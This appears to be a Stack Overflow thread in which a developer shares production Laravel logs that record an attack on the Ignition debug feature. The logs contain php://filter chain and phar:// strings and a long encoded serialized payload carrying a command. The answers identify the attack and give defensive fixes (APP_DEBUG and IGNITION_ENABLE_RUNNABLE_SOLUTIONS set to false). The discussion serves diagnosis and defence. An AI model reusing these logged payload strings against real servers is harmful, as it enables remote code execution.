# file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar

Tags: laravel, error-handling, phar

I have a Laravel 8.6.0 web application on local and a production server, both are exactly the same versions of php and apache. But I'm getting an error only in my production server implementation.

All my laravel logs are filled with the following errors. As you can see, these errors occur in the same time window (2:48am) and then an hour and some minutes later (4:15am) the same errors are logged again.

```
[2021-03-07 02:48:53] local.ERROR: file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed {"exception":"[object] (ErrorException(code: 0): file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:69)

[2021-03-07 02:48:57] local.ERROR: file_get_contents(aa): failed to open stream: No such file or directory {"exception":"[object] (ErrorException(code: 0): file_get_contents(aa): failed to open stream: No such file or directory at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)

[2021-03-07 02:49:27] local.ERROR: file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar &quot;/var/www/copa/storage/logs/laravel.log&quot; (__HALT_COMPILER(); not found) {"exception":"[object] (ErrorException(code: 0): file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar &quot;/var/www/copa/storage/logs/laravel.log&quot; (__HALT_COMPILER(); not found) at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)

[2021-03-07 02:49:58] local.ERROR: file_get_contents(=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=75=00=43=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=58=00=43=00=51=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=34=00=4F=00=54=00=41=00=36=00=49=00=6D=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=67=00=4A=00=69=00=59=00=67=00=5A=00=57=00=4E=00=6F=00=62=00=79=00=42=00=4A=00=65=00=55=00=56=00=32=00=57=00=57=00=31=00=73=00=64=00=55=00=77=00=79=00=53=00=6D=00=68=00=6A=00=4D=00=6D=00=64=00=4C=00=59=00=30=00=64=00=30=00=63=00=47=00=4A=00=48=00=64=00=32=00=64=00=4D=00=56=00=31=00=6C=00=6E=00=5A=00=57=00=35=00=4F=00=4D=00=6C=00=6C=00=33=00=63=00=48=00=64=00=68=00=4D=00=6D=00=78=00=7A=00=59=00=6B=00=4E=00=42=00=64=00=46=00=70=00=70=00=51=00=6E=00=64=00=61=00=52=00=31=00=5A=00=74=00=57=00=6C=00=63=00=31=00=61=00=31=00=70=00=59=00=53=00=6D=00=74=00=44=00=62=00=6B=00=4A=00=79=00=59=00=56=00=64=00=34=00=63=00=30=00=6C=00=44=00=4D=00=57=00=31=00=4A=00=53=00=46=00=5A=00=33=00=57=00=6B=00=64=00=47=00=4D=00=46=00=70=00=58=00=54=00=6D=00=39=00=61=00=56=00=30=00=35=00=79=00=57=00=6C=00=68=00=4B=00=61=00=30=00=4E=00=6E=00=63=00=47=00=31=00=6B=00=56=00=7A=00=56=00=71=00=5A=00=45=00=64=00=73=00=64=00=6D=00=4A=00=70=00=51=00=6D=00=5A=00=59=00=4D=00=6B=00=34=00=78=00=59=00=32=00=31=00=33=00=62=00=30=00=74=00=54=00=51=00=6A=00=64=00=44=00=61=00=55=00=46=00=6E=00=59=00=32=00=31=00=57=00=61=00=46=00=70=00=44=00=51=00=6E=00=64=00=6A=00=62=00=54=00=6B=00=77=00=59=00=6E=00=6C=00=43=00=65=00=6C=00=70=00=59=00=53=00=6A=00=4A=00=61=00=57=00=45=00=6C=00=6E=00=59=00=30=00=64=00=47=00=4D=00=47=00=46=00=44=00=51=00=54=00=68=00=51=00=52=00=48=00=64=00=72=00=53=00=30=00=64=00=57=00=61=00=6D=00=46=00=48=00=4F=00=47=00=64=00=4B=00=53=00=48=00=4E=00=34=00=54=00=48=00=6B=00=34=00=64=00=6B=00=78=00=35=00=51=00=6A=00=6C=00=4C=00=55=00=57=00=39=00=6E=00=53=00=55=00=56=00=53=00=55=00=46=00=46=00=36=00=4D=00=48=00=5A=00=4B=00=53=00=48=00=52=00=33=00=57=00=56=00=68=00=53=00=62=00=30=00=78=00=35=00=4F=00=47=00=64=00=4D=00=65=00=54=00=6B=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=4E=00=46=00=4F=00=56=00=52=00=57=00=52=00=44=00=42=00=72=00=5A=00=54=00=4E=00=4F=00=62=00=47=00=4E=00=75=00=57=00=6D=00=78=00=6A=00=61=00=54=00=68=00=32=00=54=00=32=00=6C=00=77=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=74=00=71=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=7A=00=46=00=7A=00=5A=00=32=00=56=00=44=00=53=00=57=00=74=00=6C=00=4D=00=47=00=68=00=51=00=56=00=54=00=46=00=53=00=4F=00=55=00=6C=00=70=00=51=00=54=00=6C=00=51=00=55=00=30=00=49=00=30=00=53=00=57=00=6C=00=53=00=4E=00=31=00=56=00=46=00=4F=00=56=00=4E=00=57=00=53=00=44=00=42=00=70=00=53=00=55=00=59=00=78=00=5A=00=45=00=6C=00=44=00=57=00=57=00=31=00=4A=00=52=00=6B=00=4A=00=51=00=56=00=57=00=78=00=52=00=4F=00=55=00=39=00=45=00=51=00=55=00=74=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=68=00=6F=00=62=00=46=00=6C=00=35=00=51=00=58=00=70=00=51=00=52=00=44=00=52=00=32=00=57=00=6B=00=64=00=57=00=4D=00=6B=00=77=00=7A=00=55=00=6D=00=70=00=6A=00=51=00=7A=00=68=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4D=00=65=00=56=00=4A=00=52=00=56=00=44=00=46=00=4B=00=56=00=55=00=4E=00=70=00=51=00=57=00=64=00=61=00=56=00=30=00=35=00=76=00=59=00=6E=00=6C=00=42=00=64=00=46=00=70=00=58=00=4E=00=47=00=64=00=4A=00=61=00=32=00=52=00=47=00=56=00=6B=00=4E=00=42=00=61=00=32=00=55=00=77=00=55=00=6C=00=42=00=52=00=4D=00=7A=00=42=00=6E=00=55=00=30=00=5A=00=53=00=56=00=56=00=56=00=44=00=4F=00=48=00=68=00=4D=00=61=00=6B=00=4A=00=6A=00=59=00=32=00=78=00=34=00=64=00=56=00=4E=00=48=00=4F=00=58=00=70=00=6B=00=52=00=47=00=39=00=6E=00=53=00=6B=00=68=00=30=00=53=00=56=00=51=00=78=00=54=00=6C=00=56=00=6D=00=56=00=6E=00=68=00=35=00=57=00=45=00=63=00=31=00=59=00=
```

In my .env file I have configured the log_channel to daily so it's strange to me that phar is requiring laravel.log/test.txt? Is this some kind of attack?

I've been developing laravel applications for 5 years now and this is the first time I'm getting these errors. I'm kinda worried because of the possibility of someone trying to hack this server.

Thanks in advance.

Comment: delete the file in bootstrap/cache  config.php and then run php artisan optimize and also composer dump-autoload

Answer (score 6, accepted):

It's probably automatic attack. Set your APP_DEBUG to false and check this issue https://github.com/facade/ignition/issues/350

And more information here https://www.ambionics.io/blog/laravel-debug-rce

Comment: Thank you. I actually did find the issue and set the app debug to false but didn't knew it was going to work, turns out it did. Marked as correct answer because in did it is fix.

Comment: from the link, setting `IGNITION_ENABLE_RUNNABLE_SOLUTIONS` to false should also solve the problem

Comment: @DerekS for better understanding, you should mention where IGNITION_ENABLE_RUNNABLE_SOLUTIONS will be found

Comment: @user33192 `IGNITION_ENABLE_RUNNABLE_SOLUTIONS` is found in the ignition config file (`config/ignition.php`)